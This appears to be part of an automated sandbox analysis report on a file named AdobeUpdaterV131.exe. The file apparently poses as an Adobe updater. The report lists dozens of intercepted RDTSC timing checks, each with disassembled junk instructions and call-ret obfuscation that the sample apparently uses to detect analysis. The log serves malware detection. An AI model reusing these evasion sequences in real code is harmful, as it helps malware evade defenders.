            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 908A88 second address: 908A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90CE1F second address: 90CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90F340 second address: 90F344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90F344 second address: 90F348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 908817 second address: 908825 instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0D9C3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90F348 second address: 90F351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 908825 second address: 90884C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90884C second address: 908868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0731CB8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91032C second address: 910383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F09D0D9C3D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov ebx, 57C824C3h 0x00000026 mov dword ptr [ebp+122D1D29h], eax 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 xchg eax, esi 0x00000031 jbe 00007F09D0D9C3E7h 0x00000037 jmp 00007F09D0D9C3E1h 0x0000003c push eax 0x0000003d push ecx 0x0000003e pushad 0x0000003f jo 00007F09D0D9C3D6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9122C0 second address: 912339 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F09D0731CA8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b movzx ebx, cx 0x0000002e add ebx, 74AE3EE4h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 sub edi, 4E45006Ah 0x0000003d pop edi 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+1245A33Eh], edx 0x00000046 mov bl, 0Dh 0x00000048 xchg eax, esi 0x00000049 jmp 00007F09D0731CB2h 0x0000004e push eax 0x0000004f pushad 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9131D4 second address: 9131D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 909D00 second address: 909D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90D624 second address: 90D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90E577 second address: 90E57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91141C second address: 911423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9124A0 second address: 91251E instructions: 0x00000000 rdtsc 0x00000002 js 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D33B5h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b movsx edi, cx 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F09D0731CA8h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov eax, dword ptr [ebp+122D0F45h] 0x00000045 mov ebx, dword ptr [ebp+122D35ACh] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F09D0731CA8h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Ch 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90D62A second address: 90D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90F526 second address: 90F534 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 911423 second address: 911435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F09D0D9C3D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91251E second address: 912522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90D62F second address: 90D642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F09D0D9C3DFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90F534 second address: 90F538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 911435 second address: 91143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 912522 second address: 912526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91143A second address: 911440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91726D second address: 9172E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F09D0731CA8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sub dword ptr [ebp+124474F8h], ecx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F09D0731CA8h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D28A5h], edx 0x0000004f mov di, ax 0x00000052 push 00000000h 0x00000054 mov dword ptr [ebp+122D1C04h], eax 0x0000005a add ebx, 4CE83800h 0x00000060 xchg eax, esi 0x00000061 pushad 0x00000062 push ebx 0x00000063 pushad 0x00000064 popad 0x00000065 pop ebx 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 911440 second address: 911444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9172E4 second address: 9172F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 916523 second address: 916527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9172F2 second address: 9172F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91151D second address: 911521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 911521 second address: 911527 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 911527 second address: 91152C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9193D2 second address: 9193EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0731CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9193EB second address: 9193F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F09D0D9C3D6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9193F5 second address: 9193F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 917442 second address: 91745B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91A569 second address: 91A5DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F09D0731CA8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007F09D0731CA8h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D1A01h] 0x00000045 push 00000000h 0x00000047 jmp 00007F09D0731CB9h 0x0000004c push eax 0x0000004d pushad 0x0000004e jmp 00007F09D0731CACh 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 921ED7 second address: 921EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007F09D0D9C3E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 921EE8 second address: 921EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91A746 second address: 91A74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 91A80A second address: 91A80E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92640B second address: 926437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F09D0D9C3E2h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 8C1BDE second address: 8C1BEB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0731CA8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 925B57 second address: 925B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 925CBB second address: 925CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 925E1C second address: 925E33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F09D0D9C3DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 925FD5 second address: 925FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F09D0731CB2h 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 925FF1 second address: 926010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F09D0D9C3E4h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FD7F second address: 92FD84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FF01 second address: 92FF21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F09D0D9C3E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F09D0D9C3DCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FF21 second address: 92FF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FF25 second address: 92FF40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F09D0D9C3D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jnp 00007F09D0D9C3DEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FFEF second address: 92FFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FFF5 second address: 92FFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 92FFFB second address: 92FFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 934225 second address: 934230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F09D0D9C3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 9344EB second address: 9344FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F09D0731CA6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 93463B second address: 93463F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 93463F second address: 934678 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F09D0731CA6h 0x00000008 jmp 00007F09D0731CB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F09D0731CAFh 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jo 00007F09D0731CA6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 93945E second address: 939467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 939467 second address: 93947E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F09D0731CAEh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 939CAD second address: 939CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007F09D0D9C3E3h 0x00000014 push edi 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 939FC4 second address: 939FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 940941 second address: 940945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 940945 second address: 940958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F09D0731CADh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 940958 second address: 940988 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F09D0D9C3DCh 0x00000008 jns 00007F09D0D9C3D6h 0x0000000e jmp 00007F09D0D9C3E6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007F09D0D9C3D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90A593 second address: 90A59D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90A59D second address: 90A5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90A5A1 second address: 90A60C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F09D0731CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F09D0731CA8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ecx, 77CABA14h 0x0000002d lea eax, dword ptr [ebp+1247E31Fh] 0x00000033 add edx, dword ptr [ebp+122D1B14h] 0x00000039 nop 0x0000003a jc 00007F09D0731CB0h 0x00000040 pushad 0x00000041 jnl 00007F09D0731CA6h 0x00000047 pushad 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F09D0731CB3h 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90A692 second address: 90A696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90A696 second address: 90A69C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90A69C second address: 90A6BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F09D0D9C3E0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F09D0D9C3D8h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90AD2A second address: 90AD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90AD7A second address: 90ADD7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F09D0D9C3DCh 0x00000008 jno 00007F09D0D9C3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], esi 0x00000013 push edi 0x00000014 xor ch, 00000056h 0x00000017 pop edi 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b jmp 00007F09D0D9C3E4h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 jnl 00007F09D0D9C3D8h 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c push edx 0x0000002d push ebx 0x0000002e pop ebx 0x0000002f pop edx 0x00000030 pushad 0x00000031 jmp 00007F09D0D9C3E9h 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 90B0CD second address: 90B0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 94145E second address: 941468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 947AC7 second address: 947AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeRDTSC instruction interceptor: First address: 947ED1 second address: 947ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
